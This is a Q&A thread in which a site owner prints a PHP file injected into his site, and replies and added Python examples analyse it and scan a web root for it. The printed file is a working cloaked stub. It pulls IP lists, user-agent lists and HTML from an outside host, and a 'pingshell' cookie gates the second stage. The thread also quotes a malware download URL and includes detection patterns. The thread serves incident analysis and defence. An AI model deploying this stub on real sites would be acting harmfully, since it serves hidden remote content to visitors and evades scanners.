 

I was just hacked, but I don't know how or more importantly, why. Very odd code injected

Tags:

php

EDIT: Good work all so far.

I've just found this being downloaded and run in my bash history:

http://notsoft.ru/glib

(safe to view)

Thanks all


I've just noticed the source PHP of my site has been edited. I've no idea how (I've changed all my passwords since), but what really confuses me is why.

In a couple of pages there was an iframe placed, linking to an xml.php file which was placed in my images directory (the only directory accessible by HTACCESS). This code MUST have been hand placed, as the pages are fairly complex and to auto place without breaking these pages would have been near impossible.

Now the REALLY confusing thing is the contents of this XML.php file, as from what I can see it does nothing.

Here's the code:

<?php

$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file

if(isset($_GET['ping'])){
    echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
// truncate to the range (keep only the first three octets)
$exIps = explode(".", $ip);

$ip = $exIps[0].".".$exIps[1].".".$exIps[2];

$ips = file_get_contents($urlIps);

// the leading space makes a match at offset 0 return 1, so any occurrence counts
if(strpos(" ".$ips, $ip)){ // if the IP was found in the file, stop the process..
    die;
}

$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
    $userAgent = trim($arrUa[$ua]);
    if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // if found in the User Agent, stop the process..
        die;
    }
}


if(isset($_COOKIE['pingshell'])){ // check whether the cookie is set

    echo @file_get_contents($urlHtml);

}else{

?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
      document.cookie = name + "=" + escape(value) +
    ((expires) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
}
</SCRIPT>

<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">

<?php
}
?>

Am I missing something, or is this the strangest "hack" ever?? I've done my googling and can't find any reference to it happening before.

Jon asked Dec 01 '10 20:12
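The question describes two artefacts worth checking for across a whole web root: an iframe injected into otherwise normal pages that points at a .php file, and a PHP file sitting in a directory meant for static assets that fetches remote content at request time. The triage script below, an added example that is not part of the original post, walks a directory tree and flags all three traits. The sample site it builds (file names, contents and the attacker.example URL) is constructed for the demo; the list of static-asset directory names is an assumption to adjust per site.

```python
"""Triage scan for the injection pattern described in the question.
Constructed example: the sample web root it builds is made up."""
import os
import re
import tempfile

# <iframe ... src="something.php"> in any attribute order
IFRAME_RE = re.compile(
    r'<iframe\b[^>]*\bsrc\s*=\s*["\']([^"\']+\.php[^"\']*)["\']', re.I)
# $var = "http://..." assignments, so fetches through a variable are caught too
URL_VAR_RE = re.compile(r'(\$\w+)\s*=\s*["\'](https?://[^"\']+)["\']')
# PHP helpers that pull remote content, called with a $var or a literal URL
FETCH_RE = re.compile(
    r'\b(file_get_contents|file|fopen|curl_init|include|require)\s*\(\s*'
    r'(\$\w+|["\']https?://[^"\']+["\'])', re.I)
# directories that should hold static assets only (assumed; tune per site)
STATIC_DIRS = ("images", "img", "uploads", "media")


def scan_text(path, text):
    """Return (path, kind, detail) findings for one file's source text."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        findings.append((path, "iframe_to_php", m.group(1)))
    remote_vars = dict(URL_VAR_RE.findall(text))
    for m in FETCH_RE.finditer(text):
        arg = m.group(2)
        url = remote_vars.get(arg) if arg.startswith("$") else arg.strip("\"'")
        if url:  # only report when the target really is an http(s) URL
            findings.append((path, "remote_fetch", f"{m.group(1)}({url})"))
    return findings


def scan_tree(root):
    """Walk a web root and return sorted findings with paths relative to it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            top = rel.split(os.sep)[0]
            if name.lower().endswith(".php") and top.lower() in STATIC_DIRS:
                findings.append((rel, "php_in_static_dir", name))
            if name.lower().endswith((".php", ".html", ".htm")):
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(rel, fh.read()))
    return sorted(findings)


def build_sample_site():
    """Create a constructed web root mimicking the compromise in the question."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "index.php": '<?php echo "Welcome"; ?>\n'
                     '<iframe src="images/xml.php" width="1" height="1"></iframe>\n',
        "about.php": '<?php echo "About us"; ?>\n',
        "images/xml.php": '<?php\n'
                          '$urlIps = "http://attacker.example/frame/ips.txt";\n'
                          '$ips = file_get_contents($urlIps);\n'
                          'if(strpos(" ".$ips, $_SERVER["REMOTE_ADDR"])){ die; }\n'
                          '?>\n',
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, kind, detail in scan_tree(build_sample_site()):
        print(f"{kind:18} {path}: {detail}")
```

Run it against a copy of the web root taken before cleanup so the findings can be compared with a known-good backup; a hit on `php_in_static_dir` is the quickest signal, since a directory like images/ should never contain executable server-side code.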



1 Answer

Right, what it does is as follows.

  1. Checks to see if the script was called with ping; if it was, it replies and terminates.
  2. Downloads a list of valid server IPs and checks that the request came from one, terminates if not.
  3. Downloads a list of user-agent strings and matches the browser against those to see if it is valid; if not, it terminates.
  4. If the cookie pingshell has been set previously then the HTML file is downloaded and displayed to the browser.
  5. Otherwise a cookie script is sent back to the browser, setting the pingshell cookie to a dummy value, valid for the entire domain.

Step 4 is the important bit: it looks like a proxy server to retrieve the HTML at the location given. If the link is illegal, then it's not good. Probably for marketing purposes though; they can use your URL to serve their content and get your users' click-through data.

Having said that the code only allows any form of access from prescribed IP addresses, so unless they are capturing that information first, seems like it is designed for specific use by specific people.

Orbling answered Oct 13 '22 00:10
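To make the branching in the answer concrete, here is a Python model of the gate in the injected xml.php, written as an added example rather than code from the post or the answer. It reproduces the PHP's actual tests: the visitor's first three octets are looked up as a substring of ips.txt and each trimmed line of ua.txt as a substring of the User-Agent, with `strpos(" ".$haystack, $needle)` treated as "found anywhere" (the leading space makes an offset-0 hit truthy); a request that survives both lists gets the remote HTML only if the pingshell cookie is already present, otherwise it receives the cookie-setter and the meta refresh reloads it two seconds later. The block lists and requests are constructed (documentation and private address ranges only).

```python
"""Model of the request gate in the injected xml.php.
Constructed example: the block lists and the visitors below are made up."""
from dataclasses import dataclass

# constructed stand-ins for ips.txt and ua.txt (one entry per line in the PHP)
BLOCKED_PREFIXES = ["192.0.2", "198.51.100", "10.1.23"]
BLOCKED_UA_FRAGMENTS = ["Googlebot", "bingbot", "curl", ""]  # "" = a blank line


@dataclass
class Request:
    ip: str
    user_agent: str
    has_cookie: bool = False   # pingshell cookie present on this request
    ping: bool = False         # ?ping was in the query string


def classify(req, blocked_prefixes=BLOCKED_PREFIXES,
             blocked_ua_fragments=BLOCKED_UA_FRAGMENTS):
    """Return the branch the PHP takes for one request, in the PHP's own order."""
    if req.ping:
        return "ping"                      # echoes 'Status: Ping successful!' and dies
    # explode(".", $ip) then keep octets 0..2, exactly as the PHP does
    prefix = ".".join(req.ip.split(".")[:3])
    ips_text = "\n".join(blocked_prefixes)
    # strpos(" ".$ips, $ip): a plain substring test, so "10.1.2" also hits "10.1.23"
    if prefix in ips_text:
        return "stopped_ip"
    for fragment in blocked_ua_fragments:
        fragment = fragment.strip()        # trim($arrUa[$ua])
        # an empty needle never dies in the PHP (false or offset 0 -> falsy)
        if fragment and fragment in req.user_agent:
            return "stopped_ua"
    if req.has_cookie:
        return "serve_remote_html"         # echo @file_get_contents($urlHtml)
    return "set_cookie_and_refresh"        # JS sets pingshell=12345, then meta refresh


def walk_through(requests):
    """Classify a batch of requests; returns (ip, user_agent, branch) triples."""
    return [(r.ip, r.user_agent, classify(r)) for r in requests]


if __name__ == "__main__":
    sample = [
        Request("203.0.113.7", "Mozilla/5.0 (Windows NT 6.1)"),
        Request("203.0.113.7", "Mozilla/5.0 (Windows NT 6.1)", has_cookie=True),
        Request("192.0.2.44", "Mozilla/5.0 (Windows NT 6.1)"),
        Request("203.0.113.9", "curl/7.68.0"),
        Request("203.0.113.9", "curl/7.68.0", ping=True),
        Request("10.1.2.99", "Mozilla/5.0 (Windows NT 6.1)"),
    ]
    for ip, ua, branch in walk_through(sample):
        print(f"{ip:14} {ua:30} -> {branch}")
```

Two things this makes visible that a single manual fetch does not: a first visit from a browser only ever receives the cookie-setter, which is why the file appears to "do nothing" when opened once, and anything whose address range or User-Agent is on the operator's lists never sees the second stage at all, so a crawler or a scanner fetching the page once reports it as clean.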